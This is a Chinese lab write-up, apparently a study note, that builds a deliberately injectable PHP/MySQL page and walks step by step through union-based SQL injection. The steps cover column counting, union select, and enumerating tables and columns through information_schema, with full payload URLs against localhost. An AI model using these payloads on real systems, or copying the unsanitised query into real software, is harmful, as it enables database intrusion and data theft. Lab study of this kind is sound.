1 环境介绍

union.php


<?php

$con=mysqli_connect("localhost","root","qwer","security");

// 检测连接

if (mysqli_connect_errno())

{

echo "连接失败: " . mysqli_connect_error();

}

$id = $_GET['id'];

$result = mysqli_query($con,"select * from users where `id`=".$id);

while($row = mysqli_fetch_array($result))

{

echo $row['username'] . " " . $row['password'];

echo "<br>";

}

?>

数据库

2 实验过程

访问该网址时页面返回数据库中id=1的用户名与密码

在url后添加一个单引号，再次访问，页面返回与id=1结果不同

报错咧!

访问id=1 and 1=1, 由于and 1=1为真，所以页面应返回与id=1相同的结果，如图所示。

访问id=1 and 1=2,由于and 1=2为假，所以页面应返回与id=1不同的结果，如图所示。

可以得出该网站可能存在SQL注入漏洞的结论。接着，使用order by 1-99语句查询该数据表的字段数量，可以理解为order by=1-99,如访问id=1 order by 3,页面返回与id= 1相同的结果，如图所示。

访问id=1 order by 4,页面返回与id=1不同的结果，则字段数为3, 如图所示。

order by 4出问题说明数据库中只有三个字段

在数据库中查询参数ID对应的内容，然后将数据库的内容输出到页面，由于是将数据输出到页面上的，所以可以使用Union注入，且通过order by查询结果，得到字段数为3，所以Union注入的语句如下所示。

union select 1, 2, 3

如图所示，可以看到页面成功执行，但没有返回union select的结果，这是由于代码只返回第一条结果，所以union select获取的结果没有输出到页面。

可以通过设置参数ID值，让服务端返回union select的结果，例如，把ID的值设置为-1,这样数据库中没有id=-1的数据，所以会返回union select的结果，如图

返回的结果为2 : 3,意味着在union select 1, 2, 3中，2和3的位置可以输入MySQL语句。我们尝试在2的位置查询当前数据库名(使用database ()函数)访问id=1 union select 1，database ()，3，页面成功返回了数据库信息，如图所示。

得知了数据库库名后，接下来输入以下命令查询表名。


select table_name from information_schema.tables where table_schema='security' limit 0,1;


http://127.0.0.1/four/4.1.6/union.php?id=-1%20union%20select%201,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%201,1),3

尝试在2的位置粘贴语句，这里需要加上括号，结果如图所示，页面返回了数据库的第一个表名。

如果需要看第二个表名，则修改limit中的第一位数字，例如使用limit 1, 1就可以获取数据库的第二个表名，如图所示。

Wow ！！！神奇

现在，所有的表名全部查询完毕，已知库名和表名，开始查询字段名，这里以emails表名为例，查询语句如下所示。


select column_name from information_schema.columns where table_ schema='security' and table_ name='emails' limit 0, 1;

尝试在2的位置粘贴语句，括号还是不可少，结果如图所示，获取了emails表的第一个字段名，


http://127.0.0.1/four/4.1.6/union.php?id=-1%20union%20select%201,(select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27emails%27%20limit%201,1),3

通过使用limit 1, 1,获取了emails表的第二个字段名，如图所示。

好神奇啊

当获取了库名、表名和字段名时，就可以构造SQL语句查询数据库的数据，例如查询字段email_id对应的数据，构造的SQL语句如下所示。

select email_id from security.emails limit 0,1;

结果如图所示，页面返回了email_id的第一条数据。

神奇